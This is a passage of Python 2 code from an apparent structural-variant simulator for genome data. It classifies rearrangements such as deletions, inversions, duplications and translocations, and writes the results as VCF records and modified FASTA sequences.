pin1=fin.readline().strip().split()
if not pin1: break
pin2=fin.readline().strip().split()
if not pin2: break
pin3=fin.readline().strip().split()
pin4=fin.readline().strip().split()
pin5=fin.readline().strip().split()
k1=bp_to_let([pin1])
k2=pin2[0]
if not k1 in out.keys():
out[k1]=[]
if not k2 in out[k1]:
out[k1].append(k2)
fin.close()
return out
def sv_decide_caller(k1,k2):
if k2==k1:
return 'Right'
else:
return 'Error'
def simple_del_caller(k1,k2):
out='Error'
if '^' in k2:
return out
else:
test=0
for x in k2:
if k2.count(x)>2:
test+=1
if not test==0:
return out
else:
k1a=k1.split('/')[0]
k1b=k1.split('/')[1]
k2a=k2.split('/')[0]
k2b=k2.split('/')[1]
test=0
if not len(k2a)==1:
for x in range(len(k2a)-1):
if ord(k2a[x+1])-ord(k2a[x])<1:
test+=1
if not len(k2b)==1:
for x in range(len(k2b)-1):
if ord(k2b[x+1])-ord(k2b[x])<1:
test+=1
if not test==0:
return out
else:
return 'Right'
def simple_del_let_pick(k1,k2):
k2_new=letter_seg_1(k2)
k1_new=letter_seg_1(k1)
out=[]
out.append([])
for x in k1_new[0]:
if not x in k2_new[0]:
out[0].append(x)
out.append([])
for x in k1_new[1]:
if not x in k2_new[1]:
out[1].append(x)
out2=[[],[]]
if not out[0]==[]:
out2[0]=[out[0][0]]
if not out[1]==[]:
out2[1]=[out[1][0]]
letter_seg_2(out,out2,0)
letter_seg_2(out,out2,1)
return out2
def letter_seg_1(k2):
lets=[[],[]]
for x in k2.split('/')[0]:
if not x=='^':
lets[0].append(x)
else:
lets[0][-1]+=x
for x in k2.split('/')[1]:
if not x=='^':
lets[1].append(x)
else:
lets[1][-1]+=x
return lets
def letter_seg_2(lets,let2,index):
for x in range(len(lets[index]))[1:]:
if not '^' in lets[index][x-1] and not '^' in lets[index][x]:
if ord(lets[index][x])-ord(lets[index][x-1])==1:
let2[index][-1]+=lets[index][x]
else:
let2[index].append(lets[index][x])
elif '^' in lets[index][x-1] and '^' in lets[index][x]:
if ord(lets[index][x][0])-ord(lets[index][x-1][-2])==-1:
let2[index][-1]+=lets[index][x]
else:
let2[index].append(lets[index][x])
else:
let2[index].append(lets[index][x])
def letter_seg_into_blocks(k2):
lets=letter_seg_1(k2)
let2=[[],[]]
if not lets[0]==[]:
let2[0]=[lets[0][0]]
if not lets[1]==[]:
let2[1]=[lets[1][0]]
letter_seg_2(lets,let2,0)
letter_seg_2(lets,let2,1)
for x in range(len(let2[0])):
if '^' in let2[0][x] and len(let2[0][x])>2:
temp=let2[0][x][::-1].replace('^','')+'^'
let2[0][x]=temp
for x in range(len(let2[1])):
if '^' in let2[1][x] and len(let2[1][x])>2:
temp=let2[1][x][::-1].replace('^','')+'^'
let2[1][x]=temp
return let2
def simple_inv_caller(k1,k2):
if not '^' in k2:
return 'Error'
else:
k2_blocks=letter_seg_into_blocks(k2)
k2_new='/'.join([''.join([i.replace('^','') for i in k2_blocks[0]]),
''.join([i.replace('^','') for i in k2_blocks[1]])])
if k2_new==k1:
return 'Right'
else:
return 'Error'
def simple_dup_caller(k1,k2):
if '^' in k2:
return 'Error'
else:
k2_new=letter_seg_1(k2)
k3=[]
for x in k2_new:
if not x==[]:
k3.append([x[0]])
for y in x[1:]:
if not y==k3[-1][-1]:
k3[-1].append(y)
else:
k3.append(x)
k3_new='/'.join([''.join(k3[0]),''.join(k3[1])])
if k3_new==k1:
return 'Right'
else:
return 'Error'
def simple_tra_caller(k1,k2):
if '^' in k2:
return 'Error'
else:
flag1=0
for i in k2:
if not k2.count(i)==2:
flag1+=1
if not flag1==0:
return 'Error'
else:
return 'Right'
def simple_SV_filter(sv_hash):
out={}
for k1 in sv_hash.keys():
for k2 in sv_hash[k1]:
if sv_decide_caller(k1,k2)=='Error':
if simple_del_caller(k1,k2)=='Error':
if simple_inv_caller(k1,k2)=='Error':
if simple_dup_caller(k1,k2)=='Error':
#if simple_tra_caller(k1,k2)=='Error':
if not k1 in out.keys():
out[k1]=[]
if not k2 in out[k1]:
out[k1].append(k2)
return out
def csv_region_pick(sv_size):
#pick random regions across the genome
SV_region=[]
rec=-1
sv_size=random.sample(sv_size,len(sv_size))
for k1 in range(len(chromos)):
chromosome=chromos[k1]
num_region=chromo_num_region[k1]
range_region=chromo_length[chromosome]
temp_start_region=sorted(random.sample(range(1000, range_region-1000),num_region+1))
temp_end_region=[]
k2=-1
while True:
if k2==num_region-1: break
k2+=1
print [rec,k2,len(SV_region)]
start=temp_start_region[k2]
start2=temp_start_region[k2+1]
if start2-start<1000: continue
rec+=1
temp_sv_size=random.choice(sv_size)
sv_type=random.choice(csv1_keys)
if sv_type in csv_hash.keys():
rearranged_SV=random.choice(csv1_csv2_hash[sv_type])
num_blocks=len(sv_type.split('/')[0])
end=start+temp_sv_size
if not temp_sv_size/num_blocks>200 or end>start2-300:
rec-=1
k2-=1
continue
else:
num_of_bps=num_blocks-1
mid_length=temp_sv_size/num_blocks
bps_out=[start]
for x in range(num_of_bps):
bps_out.append(random.choice(range(bps_out[-1]+100,start+(x+1)*mid_length-100)))
bps_out.append(end)
SV_region.append([chromos[k1]]+bps_out+[sv_type,rearranged_SV])
return SV_region
def csv_info_rewrite(sv_h_info):
sv_info={}
for k2 in sv_h_info:
if not k2[-2] in sv_info.keys():
sv_info[k2[-2]]={}
if not k2[-1] in sv_info[k2[-2]].keys():
sv_info[k2[-2]][k2[-1]]=[]
sv_info[k2[-2]][k2[-1]].append([str(i) for i in k2[:-2]]+[0.0])
return sv_info
def csv_rec_write(SV_region):
out_hash={}
for x1 in SV_region:
if not x1[0] in out_hash.keys():
out_hash[x1[0]]={}
if not x1[1] in out_hash[x1[0]].keys():
out_hash[x1[0]][x1[1]]=[]
if not x1 in out_hash[x1[0]][x1[1]]:
out_hash[x1[0]][x1[1]].append(x1)
fout=dict_opts['--output-prefix']+'.SV.rec'
fo=open(fout,'w')
print fout
for x1 in chromos:
if x1 in out_hash.keys():
for x2 in sorted(out_hash[x1].keys()):
for x3 in out_hash[x1][x2]:
print >>fo, ' '.join([str(i) for i in x3])
fo.close()
return out_hash
def tra_info_add(k1,k2):
for k3 in sv_info[k1][k2]:
SV_ID='_'.join([str(i) for i in k3[:-1]])
tra1[SV_ID]={}
k2a=k2.split('/')[0]
k2b=k2.split('/')[1]
bp_hash={}
block_rec=0
block_hash=[]
for a3 in k3[:-1]:
if a3 in chromos or not a3.isdigit():
block_hash.append([a3])
else:
block_hash[-1].append(a3)
for a3 in block_hash:
for a4 in range(len(a3)-2):
bp_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
block_rec+=1
for a3 in bp_hash.keys():
temp=[]
for a4 in bp_hash[a3][1:]:
temp.append(int(a4)-1)
temp.append(int(a4))
bp_hash[a3][1:]=temp
#ref_allele['left']=[ref_allele[k1[0]][0]]
#ref_allele['right']=[ref_allele[k1[-1]][1]]
bp_hash['left']=[bp_hash[k1[0]][0],bp_hash[k1[0]][1],bp_hash[k1[0]][2]]
bp_hash['right']=[bp_hash[k1[-1]][0],bp_hash[k1[-1]][3],bp_hash[k1[-1]][4]]
ref_allele={}
for a3 in bp_hash.keys():
ref_allele[a3]=[bp_hash[a3][0]]
for a4 in bp_hash[a3][1:]:
ref_allele[a3].append(ref_base_returnN(ref,bp_hash[a3][0],a4))
if not k2a==k1.split('/')[0] and del_flag_SA(k1.split('/')[0],k2a)==0:
flag1=0#flag1==0:w/o inversion in the alt structure
if '^' in k2a:
flag1+=1
flag2=0#flag2==0:w/o duplication in the alt structure
for j in k2a:
if k2a.count(j)>1:
flag2+=1
flag3=0 #flag3==0: w/o translocation
if len(k2a)>1:
for i in range(len(k2a)-1):
if not ord(k2a[i+1])>ord(k2a[i]):
flag3+=1
if flag1+flag2+flag3==0:
heta_Del_block=[]
for a1 in k1.split('/')[0]:
if not a1 in k2a:
heta_Del_block.append(a1)
tra1[SV_ID]['a']=[]
block_hash=[]
del_hash={}
block_rec=0
for a3 in a2[0]:
if a3 in chromos:
block_hash.append([a3])
else:
block_hash[-1].append(a3)
for a3 in block_hash:
for a4 in range(len(a3)-2):
del_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
block_rec+=1
if not heta_Del_block==[]:
a_heta=0
heta_Del_new=[heta_Del_block[0]]
while True:
a_heta+=1
if a_heta==len(heta_Del_block):break
if ord(heta_Del_block[a_heta])-ord(heta_Del_block[a_heta-1])==1 and del_hash[heta_Del_block[a_heta]][0]==del_hash[heta_Del_block[a_heta-1]][0]:
heta_Del_new[-1]+=heta_Del_block[a_heta]
else:
heta_Del_new.append(heta_Del_block[a_heta])
for a3 in heta_Del_new:
a4=a3[0]
tra1[SV_ID]['a'].append(['DEL',del_hash[a4][0],int(del_hash[a4][1]),ref_allele[a4][2]])
a4=a3[-1]
tra1[SV_ID]['a'][-1].append(int(del_hash[a4][2])-1)
else:
tra1[SV_ID]['a']=[]
t1=[]
for a3 in k2a:
if not a3=='^':
t1.append(a3)
else:
t1[-1]+=a3
t2=[t1[0]]
for a3 in t1[1:]:
if not '^' in a3 and not '^' in t2[-1] and ord(a3)-ord(t2[-1][-1])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-1]][0]:
t2[-1]+=a3
elif '^' in a3 and '^' in t2[-1] and ord(t2[-1][-2])-ord(a3[0])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-2]][0]:
t2[-1]+=a3
else:
t2.append(a3)
a3='left'
a4=t2[0]
l_chr=bp_hash[a3][0]
r_chr=bp_hash[a4[0]][0]
if not '^' in a4:
if not a4[0]==k1[0]:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3][1])+']'+ref_allele[a4[0]][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+'['+r_chr+':'+str(bp_hash[a4[0]][2])+'['])
elif '^' in a4:
tra1[SV_ID]['a'].append([r_chr, bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3][1])+']'])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
for t3 in range(len(t2)-1):
a3=t2[t3]
a4=t2[t3+1]
l_chr=bp_hash[a3[0]][0]
r_chr=bp_hash[a4[0]][0]
if not '^' in a3 and not '^' in a4:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4[0]][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['])
elif '^' in a3 and not '^' in a4:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4[0]][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['+ref_allele[a3[-2]][2]])
elif not '^' in a3 and '^' in a4:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
elif '^' in a3 and '^' in a4:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2], ']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'+ref_allele[a3[-2]][2]])
if len(t2)>1:
a3=t2[t3+1]
else:
a3=t2[0]
a4='right'
l_chr=bp_hash[a3[0]][0]
r_chr=bp_hash[a4][0]
if not '^' in a3:
if not a3[-1]==k1[-1]:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['])
if '^' in a3:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['+ref_allele[a3[-2]][2]])
#print [k1,k2]
if not k2b==k1.split('/')[1] and del_flag_SA(k1.split('/')[1],k2b)==0:
flag1=0#flag1==0:w/o inversion in the alt structure
if '^' in k2b:
flag1+=1
flag2=0#flag2==0:w/o duplication in the alt structure
for j in k2b:
if k2b.count(j)>1:
flag2+=1
flag3=0 #flag3==0: w/o translocation
if len(k2b)>1:
for i in range(len(k2b)-1):
if not ord(k2b[i+1])>ord(k2b[i]):
flag3+=1
if flag1+flag2+flag3==0:
heta_Del_block=[]
for a1 in k1.split('/')[1]:
if not a1 in k2b:
heta_Del_block.append(a1)
tra1[SV_ID]['b']=[]
block_hash=[]
del_hash={}
block_rec=0
for a3 in a2[0]:
if a3 in chromos:
block_hash.append([a3])
else:
block_hash[-1].append(a3)
for a3 in block_hash:
for a4 in range(len(a3)-2):
del_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
block_rec+=1
if not heta_Del_block==[]:
a_heta=0
heta_Del_new=[heta_Del_block[0]]
while True:
a_heta+=1
if a_heta==len(heta_Del_block):break
if ord(heta_Del_block[a_heta])-ord(heta_Del_block[a_heta-1])==1 and del_hash[heta_Del_block[a_heta]][0]==del_hash[heta_Del_block[a_heta-1]][0]:
heta_Del_new[-1]+=heta_Del_block[a_heta]
else:
heta_Del_new.append(heta_Del_block[a_heta])
for a3 in heta_Del_new:
a4=a3[0]
tra1[SV_ID]['b'].append(['DEL',del_hash[a4][0],int(del_hash[a4][1]),ref_allele[a4][2]])
a4=a3[-1]
tra1[SV_ID]['b'][-1].append(int(del_hash[a4][2])-1)
else:
tra1[SV_ID]['b']=[]
t1=[]
for a3 in k2b:
if not a3=='^':
t1.append(a3)
else:
t1[-1]+=a3
t2=[t1[0]]
for a3 in t1[1:]:
if not '^' in a3 and not '^' in t2[-1] and ord(a3)-ord(t2[-1][-1])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-1]][0]:
t2[-1]+=a3
elif '^' in a3 and '^' in t2[-1] and ord(t2[-1][-2])-ord(a3[0])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-2]][0]:
t2[-1]+=a3
else:
t2.append(a3)
a3='left'
a4=t2[0]
l_chr=bp_hash[a3][0]
r_chr=bp_hash[a4[0]][0]
if not '^' in a4:
if not a4[0]==k1[0]:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3][1])+']'+ref_allele[a4[0]][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+'['+r_chr+':'+str(bp_hash[a4[0]][2])+'['])
elif '^' in a4:
tra1[SV_ID]['b'].append([r_chr, bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3][1])+']'])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
for t3 in range(len(t2)-1):
a3=t2[t3]
a4=t2[t3+1]
l_chr=bp_hash[a3[0]][0]
r_chr=bp_hash[a4[0]][0]
if not '^' in a3 and not '^' in a4:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4[0]][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['])
elif '^' in a3 and not '^' in a4:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4[0]][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['+ref_allele[a3[-2]][2]])
elif not '^' in a3 and '^' in a4:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
elif '^' in a3 and '^' in a4:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2], ']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'+ref_allele[a3[-2]][2]])
if len(t2)>1:
a3=t2[t3+1]
else:
a3=t2[0]
a4='right'
l_chr=bp_hash[a3[0]][0]
r_chr=bp_hash[a4][0]
if not '^' in a3:
if not a3[-1]==k1[-1]:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['])
if '^' in a3:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['+ref_allele[a3[-2]][2]])
def hash_reorder():
for ka1 in del1.keys():
if not ka1 in sv_out.keys():
sv_out[ka1]={}
for ka2 in del1[ka1]:
#fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,ka1,str(ka2[0]+1),str(ka2[0]+1)))
#tre=fref.readline().strip().split()
#REF_AL=fref.readline().strip().split()[0]
REF_AL='N'
Pass_Sign='PASS'
if ka2[3]<score_Cff:
Pass_Sign='LowQual'
if ka2[2]=='heta':
GenoType='1|0'
elif ka2[2]=='hetb':
GenoType='0|1'
elif ka2[2]=='homo':
GenoType='1|1'
else:
print ka2[2]
ka_new=[ka1,ka2[0],ka2[-1],REF_AL,'<DEL>',ka2[3],Pass_Sign,'SVTYPE=DEL;END='+str(ka2[1]),'GT',GenoType]
if not ka2[-1] in sv_out[ka1].keys():
sv_out[ka1][ka2[-1]]=[]
if not ka_new in sv_out[ka1][ka2[-1]]:
sv_out[ka1][ka2[-1]].append(ka_new)
for ka1 in inv1.keys():
if not ka1 in sv_out.keys():
sv_out[ka1]={}
for ka2 in inv1[ka1]:
#fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,ka1,str(ka2[0]+1),str(ka2[0]+1)))
#tre=fref.readline().strip().split()
#REF_AL=fref.readline().strip().split()[0]
REF_AL='N'
Pass_Sign='PASS'
if ka2[3]<score_Cff:
Pass_Sign='LowQual'
if ka2[2]=='heta':
GenoType='1|0'
elif ka2[2]=='hetb':
GenoType='0|1'
elif ka2[2]=='homo':
GenoType='1|1'
else:
print ka2[2]
ka_new=[ka1,ka2[0],ka2[-1],REF_AL,'<INV>',ka2[3],Pass_Sign,'SVTYPE=INV;END='+str(ka2[1]),'GT',GenoType]
if not ka2[-1] in sv_out[ka1].keys():
sv_out[ka1][ka2[-1]]=[]
if not ka_new in sv_out[ka1][ka2[-1]]:
sv_out[ka1][ka2[-1]].append(ka_new)
for ka1 in dup1.keys():
if not ka1 in sv_out.keys():
sv_out[ka1]={}
for ka2 in dup1[ka1]:
#fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,ka1,str(ka2[0]+1),str(ka2[0]+1)))
#tre=fref.readline().strip().split()
#REF_AL=fref.readline().strip().split()[0]
REF_AL='N'
CopyNumber=str(ka2[-1])
Pass_Sign='PASS'
if ka2[3]<score_Cff:
Pass_Sign='LowQual'
if ka2[2]=='heta':
GenoType='1|0'
elif ka2[2]=='hetb':
GenoType='0|1'
elif ka2[2]=='homo':
GenoType='1|1'
else:
print ka2[2]
ka_new=[ka1,ka2[0],ka2[-2],REF_AL,'<DUP>',ka2[3],Pass_Sign,'SVTYPE=DUP;END='+str(ka2[1]),'GT:CN',GenoType+':'+CopyNumber]
if not ka2[-2] in sv_out[ka1].keys():
sv_out[ka1][ka2[-2]]=[]
if not ka_new in sv_out[ka1][ka2[-2]]:
sv_out[ka1][ka2[-2]].append(ka_new)
for ka1 in tra1.keys():
ks1=ka1.split('_')[0]
ks2='_'.join(ka1.split('_')[:-1])
SV_Score=float(ka1.split('_')[-1])
Pass_Sign='PASS'
if SV_Score<score_Cff:
Pass_Sign='LowQual'
if not ks1 in sv_out.keys():
sv_out[ks1]={}
if not ks2 in sv_out[ks1].keys():
sv_out[ks1][ks2]=[]
for ka2 in tra1[ka1].keys():
hetx='het'+ka2
if ka2=='a':
GenoType='1|0'
elif ka2=='b':
GenoType='0|1'
else:
print ka2[2]
for ka3 in tra1[ka1][ka2]:
ka_new=ka3[:2]+[ks2,ka3[2]]+ka3[3:]+[SV_Score,Pass_Sign,'SVTYPE=TRA','GT',GenoType]
if not ka_new in sv_out[ks1][ks2]:
sv_out[ks1][ks2].append(ka_new)
def fasta_comp_write_a(fasta_out):
fo1=open(fasta_out.replace('.comp.fa','.comp1.fa'),'w')
#fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'w')
fo1.close()
#fo2.close()
print fasta_out.replace('.comp.fa','.comp1.fa')
#print fasta_out.replace('.het.fa','.het2.fa')
for k1 in chromos:
fo1=open(fasta_out.replace('.comp.fa','.comp1.fa'),'a')
#fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'a')
print >>fo1, '>'+k1
#print >>fo2, '>'+k1
new1_ref=''
rec1_start=0
#new2_ref=''
#rec2_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
print [k1,k2]
rec1_start+=1
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
if not k3[0][1][0]==k3[0][1][2]:
new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
else:
new1_ref+=Ref_Ref_Produce(k1,[start,end],ref)
rec1_start=end
rec1_start+=1
#rec2_start+=1
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
new1_seq=[]
for ka1 in range(len(new1_ref)/60):
new1_seq.append(new1_ref[ka1*60:(ka1+1)*60])
new1_seq.append(new1_ref[(ka1+1)*60:])
for ka1 in new1_seq:
if not ka1=='':
print >>fo1, ka1
fo1.close()
def fasta_comp_write_b(fasta_out):
#fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'w')
fo2=open(fasta_out.replace('.comp.fa','.comp2.fa'),'w')
#fo1.close()
fo2.close()
#print fasta_out.replace('.het.fa','.het1.fa')
print fasta_out.replace('.comp.fa','.comp2.fa')
for k1 in chromos:
#fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'a')
fo2=open(fasta_out.replace('.comp.fa','.comp2.fa'),'a')
#print >>fo1, '>'+k1
print >>fo2, '>'+k1
#new1_ref=''
#rec1_start=0
new2_ref=''
rec2_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
print [k1,k2]
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
rec2_start+=1
new2_ref+=Ref_Ref_Produce(k1,[rec2_start,start-1],ref)
if not k3[0][1][1]==k3[0][1][2]:
new2_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][1],ref)
else:
new2_ref+=Ref_Ref_Produce(k1,[start,end],ref)
rec2_start=end
#rec1_start+=1
rec2_start+=1
new2_ref+=Ref_Ref_Produce(k1,[rec2_start,chromo_length[k1]],ref)
new2_seq=[]
for ka1 in range(len(new2_ref)/60):
new2_seq.append(new2_ref[ka1*60:(ka1+1)*60])
new2_seq.append(new2_ref[(ka1+1)*60:])
for ka1 in new2_seq:
if not ka1=='':
print >>fo2, ka1
#fo1.close()
fo2.close()
def write_VCF_header(output_file):
fo=open(output_file,'w')
print output_file
print>>fo, '##fileformat=VCFv4.1'
print>>fo,'##fileDate='+time.strftime("%Y%m%d")
print>>fo,'##reference=hg19'
print>>fo,'##INFO=<ID=BKPTID,Number=.,Type=String,Description="ID of the assembled alternate allele in the assembly file">'
print>>fo,'##INFO=<ID=CIEND,Number=2,Type=Integer,Description="Confidence interval around END for imprecise variants">'
print>>fo,'##INFO=<ID=CIPOS,Number=2,Type=Integer,Description="Confidence interval around POS for imprecise variants">'
print>>fo,'##INFO=<ID=END,Number=1,Type=Integer,Description="End position of the variant described in this record">'
print>>fo,'##INFO=<ID=HOMLEN,Number=.,Type=Integer,Description="Length of base pair identical micro-homology at event breakpoints">'
print>>fo,'##INFO=<ID=HOMSEQ,Number=.,Type=String,Description="Sequence of base pair identical micro-homology at event breakpoints">'
print>>fo,'##INFO=<ID=IMPRECISE,Number=0,Type=Flag,Description="Imprecise structural variation">'
print>>fo,'##INFO=<ID=MEINFO,Number=4,Type=String,Description="Mobile element info of the form NAME,START,END,POLARITY">'
print>>fo,'##INFO=<ID=SVLEN,Number=.,Type=Integer,Description="Difference in length between REF and ALT alleles">'
print>>fo,'##INFO=<ID=SVTYPE,Number=1,Type=String,Description="Type of structural variant">'
print>>fo,'##FILTER=<ID=LowQual,Description="Score of final structural - Theoretical Score <-50">'
print>>fo,'##ALT=<ID=DEL,Description="Deletion">'
print>>fo,'##ALT=<ID=DEL:ME:ALU,Description="Deletion of ALU element">'
print>>fo,'##ALT=<ID=DEL:ME:L1,Description="Deletion of L1 element">'
print>>fo,'##ALT=<ID=DUP,Description="Duplication">'
print>>fo,'##ALT=<ID=DUP:TANDEM,Description="Tandem Duplication">'
print>>fo,'##ALT=<ID=INS,Description="Insertion of novel sequence">'
print>>fo,'##ALT=<ID=INS:ME:ALU,Description="Insertion of ALU element">'
print>>fo,'##ALT=<ID=INS:ME:L1,Description="Insertion of L1 element">'
print>>fo,'##ALT=<ID=INV,Description="Inversion">'
print>>fo,'##ALT=<ID=CNV,Description="Copy number variable region">'
print>>fo,'##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">'
print>>fo,'##FORMAT=<ID=GQ,Number=1,Type=Float,Description="Genotype quality">'
print>>fo,'##FORMAT=<ID=CN,Number=1,Type=Integer,Description="Copy number genotype for imprecise events">'
print>>fo,'##FORMAT=<ID=CNQ,Number=1,Type=Float,Description="Copy number genotype quality for imprecise events">'
print>>fo,'\t'.join(['#CHROM','POS','ID','REF','ALT','QUAL','FILTER','INFO','FORMAT',output_file.split('/')[-1].replace('.vcf','')])
fo.close()
def write_VCF_main(output_file):
fo=open(output_file,'a')
print output_file
sv_reorganize={}
for k1 in sv_out.keys():
sv_reorganize[k1]={}
for k2 in sv_out[k1].keys():
start=int(k2.split('_')[1])
if not start in sv_reorganize[k1].keys():
sv_reorganize[k1][start]={}
SVtemp_a=[]
SVtemp_b=[]
for k3 in sv_out[k1][k2]:
if not k3[:-1] in SVtemp_a:
SVtemp_a.append(k3[:-1])
SVtemp_b.append([k3[-1]])
else:
SVtemp_b[SVtemp_a.index(k3[:-1])].append(k3[-1])
SVtemp=[]
sv_reorganize[k1][start][k2]=[]
for k3 in range(len(SVtemp_a)):
if len(SVtemp_b[k3])==2 and SVtemp_b[k3] in [['0|1', '1|0'],['1|0', '0|1']]:
SVtemp_b[k3]=['1|1']
for k3 in range(len(SVtemp_a)):
for k4 in SVtemp_b[k3]:
sv_reorganize[k1][start][k2].append(SVtemp_a[k3]+[k4])
for k1 in chromos:
if k1 in sv_reorganize.keys():
for k2 in sorted(sv_reorganize[k1].keys()):
for k3 in sorted(sv_reorganize[k1][k2].keys()):
for k4 in sv_reorganize[k1][k2][k3]:
if k4[3]=='N':
k4[3]=ref_base_returnN(ref,k4[0],k4[1])
print >>fo, '\t'.join([str(i) for i in k4])
fo.close()
def simple_flag_SA(k1,k2):
temp=[]
break_flag=0
for i in k2:
if not i=='^':
temp.append(i)
else:
temp[-1]+=i
temp2=[temp[0]]
for i in range(len(temp[1:])):
